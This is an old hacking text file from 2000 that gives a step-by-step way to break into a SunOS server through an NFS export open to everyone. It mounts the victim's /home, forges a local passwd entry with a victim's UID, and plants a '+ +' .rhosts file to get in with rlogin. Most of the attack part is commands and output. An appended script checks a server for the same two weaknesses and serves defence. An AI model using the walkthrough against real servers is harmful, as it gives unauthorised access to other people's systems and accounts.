-----------------------------------------------------------------------------
 Date   : 20. June 2000
 Title  : How to hack easily and simply a SunOS server?
 Author : kozo2000
-----------------------------------------------------------------------------

How to hack easily and simply a SunOS server?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Requirements:
 - a linux server, where you have root access
 - RPC program installed on the destination server

mysite:~#/usr/sbin/showmount -e victim.site.com

This command displays the exported directories on the destination server and
who has access to them. If that is (everyone), then you can hack this server.
But if it displays 'RPC: Program not installed', then it's better to give up
trying; you won't hack this server this way.

So, if everything is OK, do the following:

mysite:~#/usr/sbin/showmount -e victim.site.com
/usr victim.site.com
/home (everyone)      -> everyone can see the directory /home :)
/cdrom (everyone)
...etc.

mysite:~#mkdir /tmp/mount
mysite:~#/bin/mount -nt nfs victim.site.com:/home /tmp/mount/

Mount the directory (note that you can only mount with root access).

mysite:~#ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

You found a user named rapper with uid 102.
Now add a line to the file /etc/passwd:

mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd
   -> You need to be root!!
mysite:~#su - rapper
   -> Now simply log in as rapper

Welcome to rapper's user.

mysite:~>echo "+ +" > rapper/.rhosts
   -> Create a file named .rhosts, and add + + (needed for rlogin)
mysite:~>cd /
mysite:~>rlogin victim.site.com
   -> Log in with rlogin
SunOs ver....(crap)
victim:~$

Now you have an account at the destination server.
Now comes hacking for root access. This is not described here. (sorry...)
But the stuff above works.
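
The two conditions this walkthrough depends on, an export open to (everyone)
and a .rhosts file containing "+ +", can both be checked for on your own
servers. The script below is an added example, not part of the original text;
the function names and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example (not from the original text).
# Assumption: showmount -e marks unrestricted exports as "(everyone)" or "*".

# Read `showmount -e` output on stdin and print every exported path
# that any host is allowed to mount.
world_exports() {
    awk '$1 ~ /^\// && ($2 == "(everyone)" || $2 == "*") { print $1 }'
}

# Print every .rhosts file under directory $1 that has a "+" wildcard in
# the host or user field ("+ +" trusts every user on every host).
wildcard_rhosts() {
    find "$1" -name .rhosts -type f 2>/dev/null | while IFS= read -r f; do
        if awk '$1 == "+" || $2 == "+" { hit = 1 } END { exit !hit }' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed sample input, modelled on the export listing shown above.
sample_exports() {
    cat <<'EOF'
/usr victim.site.com
/home (everyone)
/cdrom (everyone)
EOF
}

# Demo on the constructed sample. On a real server, pipe the output of
# `showmount -e localhost` into world_exports and point wildcard_rhosts
# at the directory that holds the home directories.
echo "Exports mountable by any host:"
sample_exports | world_exports
```

Any path printed by world_exports should be restricted to named clients in
the server's export configuration, and any file printed by wildcard_rhosts
should be removed.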